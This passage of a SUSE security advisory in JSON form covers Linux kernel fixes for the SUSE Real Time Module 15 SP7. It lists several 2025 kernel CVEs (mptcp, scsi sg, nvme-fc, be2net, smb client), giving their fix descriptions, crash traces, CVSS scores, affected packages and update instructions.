"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40254"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbe2net: pass wrb_params in case of OS2BMC\n\nbe_insert_vlan_in_pkt() is called with the wrb_params argument being NULL\nat be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL\npointer when processing a workaround for specific packet, as commit\nbc0c3405abbb (\"be2net: fix a Tx stall bug caused by a specific ipv6\npacket\") states.\n\nThe correct way would be to pass the wrb_params from be_xmit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40264",
"url": "https://www.suse.com/security/cve/CVE-2025-40264"
},
{
"category": "external",
"summary": "SUSE Bug 1254835 for CVE-2025-40264",
"url": "https://bugzilla.suse.com/1254835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40264"
},
{
"cve": "CVE-2025-40328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_close_cached_fid()\n\nfind_or_create_cached_dir() could grab a new reference after kref_put()\nhad seen the refcount drop to zero but before cfid_list_lock is acquired\nin smb2_close_cached_fid(), leading to use-after-free.\n\nSwitch to kref_put_lock() so cfid_release() is called with\ncfid_list_lock held, closing that gap.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40328",
"url": "https://www.suse.com/security/cve/CVE-2025-40328"
},
{
"category": "external",
"summary": "SUSE Bug 1254624 for CVE-2025-40328",
"url": "https://bugzilla.suse.com/1254624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
